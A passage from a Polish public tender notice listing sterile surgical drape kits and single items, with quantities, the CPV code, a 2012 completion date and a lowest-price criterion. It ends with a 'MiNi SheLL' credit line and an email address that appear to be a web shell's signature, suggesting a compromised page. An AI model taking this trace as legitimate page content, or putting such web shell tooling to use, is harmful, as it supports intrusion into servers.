5) samoprzylepna taśma włókninowa 9 x 49cm - 2 szt.
6) ściereczki chłonne - 4 szt
7) serweta na stół instrumentalny 150 x 190cm (owinięcie zestawu) - 1 szt	zestaw	40
Sterylny zestaw do zabiegów ginekologicznych dolnych wykonany w części krytycznej z min. trójwarstwowego , chłonnego,wytrzymałego, nieprzemakalnego laminatu o gramaturze min.70 g/m. 
Minimalny skład i wymiary: 
1) serweta główna 200/270 x 215cm zintegrowana z osłonami na kończyny  - 1 szt.
2) serweta ginekologiczna 60 x 116cm z otworem 8 x 11cm,  z kieszenią na płyny oraz serwetą samoprzylepną - 1 szt.
3) organizator przewodów 9 x 18cm - 1 szt. 
4) osłona na stolik Mayo 79 x 145cm wykonana z mocnej folii oraz warstwy chłonnej zabezpieczającej w całości blat stołu - 1 szt
5) ściereczki chłonne - 2 szt
6) serweta na stół instrumentalny 150 x 190cm (owinięcie zestawu) - 1 szt	zestaw	20
Sterylny zestaw do laparoskopii w ułożeniu pacjenta na plecach w pozycji ginekologicznej wykonany w części krytycznej z min. trójwarstwowego , chłonnego,wytrzymałego, nieprzemakalnego laminatu o gramaturze min.70 g/m2. 
Minimalny skład i wymiary:
1) serweta główna 250/175/270 x 260cm z otworem w części brzusznej 25 x 30cm, po dłuższcyh stronach otworu znajdują się zintegrowane z obłożeniem dwukomorowe kieszenie na akcesoria medycznej, powyżej krawędzi górnej znajduje sie organizator przewodów - 1 szt.
2) foliowa osłona na przewody i kamerę 12 x 240cm - 1 szt.
4) osłona na stolik Mayo 79 x 145cm wykonana z mocnej folii oraz warswty chlonnej zabezpieczającej w całości blat stołu - 1 szt
5) samoprzylepna taśma włókninowa 9 x 49cm - 1 szt.
6) ściereczki chłonne - 4 szt
7) serweta na stół instrumentalny 150 x 190cm (owinięcie zestawu) - 1 szt	zestaw	40
Sterylny zestaw do zabiegu cięcia cesarskiego w ułożeniu prostym, wykonany z min. dwuwarstwowego chłonnego i nieprzemakalnego laminatu o gramaturze min. 60g/m. Minimalny skład i wymiary:
1) serweta główna o wymiarach 175 x 300cm w części centralnej z otworem trapezowym o wymiarach 20 x 30 x 20 cm wypełnionym folią chirurgiczną. Otwór okala worek przechwytujący płyny z usztywnionym brzegiem, wyposażony w zawór do podłączenia drenu - 1 szt.
2) dwukomorowa, foliowa kieszeń samoprzylepna - 1 szt
3/ ręczniki chłonne - 4 szt
4) włókninowa taśma samoprzylepna 9 x 49 cm - 1 szt
5) serweta 80 x 90 cm z włókniny bawełnopodobnej do owinięcia noworodka - 1 szt	zestaw	95
6) osłona na stolik Mayo 79 x 145cm wykonana z mocnej folii oraz warswty chłonnej zabezpieczającej w całości blat stołu - 1 szt
7) wzmocniony fartuch chirurgiczny wykonany z włókniny trójwarstwowej typu SMS o gramaturze min. 35g/m , nieprzemakalne  wstawki w przedniej części i w rękawach, wykonane z laminatu o gramaturze min.40 g/m2 , u góry zapinany na rzep, rękawy wykończone elastycznym mankietem, troki łączone kartonikiem. Rozmiar XL - 2 szt
8) wzmocniony fartuch chirurgiczny wykonany z włókniny trójwarstwowej typu SMS o gramaturze min. 35g/m2, nieprzemakalne  wstawki w przedniej części i w rękawach, wykonane z laminatu o gramaturze min. 40 g/m , u góry zapinany na rzep, rękawy wykończone elastycznym mankietem, troki łączone kartonikiem. Rozmiar L - 1 szt
9) serweta na stół instrumentalny 150 x 200cm (owinięcie zestawu) - 1 szt		
Serweta sterylna do przykrycia stolika dla instrumentariuszki wykonana w  z min.dwuwarstwowego chłonnego i nieprzemakalnego laminatu  o gramaturze  min. 60 g/m, 140-150 x190-200cm	szt.	140
Serweta sterylna samoprzylepna wykonana w z min.dwuwarstwowego chłonnego i nieprzemakalnego laminatu w części krytycznej o gramaturze  min. 60 g/m, 75 x 90	szt.	325
Foliowa kieszeń samoprzylepna, 35x40	szt.	250
Włókninowa taśma samoprzylepna, 8-9 x 49-50	szt.	500
Sterylny, foliowy pokrowiec jednorazowy do apartau RTG na ramię C, 220 x100 cm	szt.	60
Sterylny, foliowy pokrowiec jednorazowy na przewody, 13 - 16 x 200 - 250cm	szt.	210
Sterylna osłona na kończynę z min. dwuwarstwowego, nieprzemakalnego laminatu o gramaturze min. 60g/m,  pakowana z dwoma taśmami samoprzylepnymi,  35-37 x 75-80 cm	szt.	50
Sterylna osłona na stolik Mayo wykonana z folii PE  oraz warstwy chłonnej w całości zabezpieczającej blat stołu, 79-84 x 145-150 cm	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com